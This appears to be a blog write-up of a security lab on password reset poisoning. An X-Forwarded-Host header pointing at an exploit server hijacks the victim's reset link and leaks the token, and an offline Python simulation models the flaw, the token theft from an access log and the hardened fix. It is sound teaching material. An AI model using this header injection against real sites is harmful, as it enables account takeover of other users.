Lab link.
The lab description says it is vulnerable to password reset poisoning. First, we reset the password of the wiener user to understand how the reset flow works.

Specifying the username in the POST /forgot-password request is enough to trigger a reset email. The middleware builds the reset link from the X-Forwarded-Host header, so if we add that header pointing at our exploit server, the email still goes to the requested user (carlos), but the link inside it now points to our exploit server with the user's token attached.

If we look at the exploit server's access log, we see the request made when the victim opened the link, including the value of "temp-forgot-password-token=". If we put that value into the token parameter of the real site's reset URL, we can set a new password for the user carlos.
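The following is an added example, not code from the original post or from PortSwigger. It models the three steps above in-process: the middleware's flawed link builder (which trusts X-Forwarded-Host) next to the hardened form (which uses a configured host), the poisoned request headers, and the parsing of the stolen token out of an exploit-server access-log line. The hostnames, the token value and the log-line format are constructed for the example, not taken from the lab.

```python
import re
from urllib.parse import urlparse

# Assumed values for the walk-through; the real lab hosts and token differ.
CANONICAL_HOST = "vulnerable-website.example"  # host the app is configured to use
EXPLOIT_HOST = "exploit-server.example"        # attacker-controlled host

TOKEN_RE = re.compile(r"temp-forgot-password-token=([A-Za-z0-9]+)")


def build_reset_link(request_headers: dict, token: str, *, trust_forwarded_host: bool) -> str:
    """Build the link that goes into the reset e-mail.

    trust_forwarded_host=True reproduces the lab's flaw: the host for the link
    comes from X-Forwarded-Host (falling back to Host), so an attacker's header
    ends up in the victim's e-mail. False is the hardened form: the link always
    uses the configured canonical host and ignores anything the client sent.
    """
    headers = {k.lower(): v for k, v in request_headers.items()}
    host = CANONICAL_HOST
    if trust_forwarded_host:
        host = headers.get("x-forwarded-host", headers.get("host", CANONICAL_HOST))
    return f"https://{host}/forgot-password?temp-forgot-password-token={token}"


def poisoned_reset_headers(target_host: str) -> dict:
    """Headers the attacker adds to POST /forgot-password.

    Host stays the real site so the request is routed normally; X-Forwarded-Host
    is the injected value the middleware copies into the reset link.
    """
    return {
        "Host": target_host,
        "X-Forwarded-Host": EXPLOIT_HOST,
        "Content-Type": "application/x-www-form-urlencoded",
    }


def tokens_from_access_log(log_text: str) -> list:
    """Extract every reset token from exploit-server access-log text.

    Only lines from the victim's click carry the token; other hits (favicon,
    scanners) are ignored because the regex does not match them.
    """
    return TOKEN_RE.findall(log_text)


def simulate_poisoning(issued_token: str) -> dict:
    """End-to-end walk-through of the attack logic, entirely offline.

    1. Attacker sends the poisoned reset request for the victim.
    2. The vulnerable middleware builds the e-mail link with the attacker's host.
    3. The victim opens the link; the exploit server logs the request.
    4. The attacker reads the token back out of the access log.
    """
    link = build_reset_link(
        poisoned_reset_headers(CANONICAL_HOST), issued_token, trust_forwarded_host=True
    )
    path = urlparse(link).path + "?" + urlparse(link).query
    # Constructed access-log line in the general shape of an exploit-server log.
    log_line = (
        f'10.0.0.7 2024-01-01 12:00:00 +0000 "GET {path} HTTP/1.1" 404 "Mozilla/5.0"\n'
        '10.0.0.7 2024-01-01 12:00:01 +0000 "GET /favicon.ico HTTP/1.1" 404 "Mozilla/5.0"\n'
    )
    found = tokens_from_access_log(log_line)
    return {
        "link_host": urlparse(link).hostname,
        "log": log_line,
        "token": found[0] if found else None,
    }


def hardened_link_host(issued_token: str) -> str:
    """Same poisoned request against the hardened builder: host stays canonical."""
    link = build_reset_link(
        poisoned_reset_headers(CANONICAL_HOST), issued_token, trust_forwarded_host=False
    )
    return urlparse(link).hostname


if __name__ == "__main__":
    result = simulate_poisoning("abc123")
    print("vulnerable link host:", result["link_host"])
    print("recovered token:", result["token"])
    print("hardened link host:", hardened_link_host("abc123"))
```

The recovered token is then submitted to the real site's reset endpoint, exactly as described for carlos above. The fix shown in the hardened branch is the same one the lab points at: never derive an absolute URL sent to a user from request-controlled headers such as X-Forwarded-Host or Host; use a configured origin instead, or at least validate the header against an allowlist.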
Hello, I am Aleyna Doğan. I work as a Sr. Cyber Threat Intelligence Analyst. On my blog, my friends and I publish the posts we want to share. Have a good read.